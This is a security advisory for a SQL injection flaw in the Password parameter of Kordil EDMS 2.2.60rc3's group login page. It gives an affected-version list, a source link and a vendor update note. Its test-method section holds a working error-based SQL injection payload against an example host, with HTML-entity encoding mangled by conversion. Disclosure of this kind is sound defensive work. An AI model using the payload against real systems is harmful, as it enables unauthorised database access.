Release date:
Updated on: 2012-12-07
Affected Systems:
Sourceforge Kordil EDMS 2.2.60rc3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56823
Kordil EDMS is a document control and management system.
Kordil EDMS 2.2.60rc3 and other versions do not properly filter the 'Password' parameter value on the global_group_login.php page. Remote attackers can exploit this vulnerability to operate the database illegally.
<* Source: Woody Hughes (woody@thewoodman.org)
Link: http://packetstormsecurity.org/files/118622/INGRES-12052012.txt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Script: http://www.example.com/kordil/global_group_login.php
Payload: User = admin & amp; Password = 12345 & #39; and extractvalue (1299, CONCAT (0x5c, 0x3a6a6f793a, (SELECT (CASE
WHEN (1299 = 1299) THEN 1 ELSE 0 END), 0x3a6a77683a) AND
& #39; hax & #39 ;=& #39; hax & amp; act = n & amp; QS_Submit = Submit
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sourceforge
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://sourceforge.net/projects/kordiledms/files/latest/download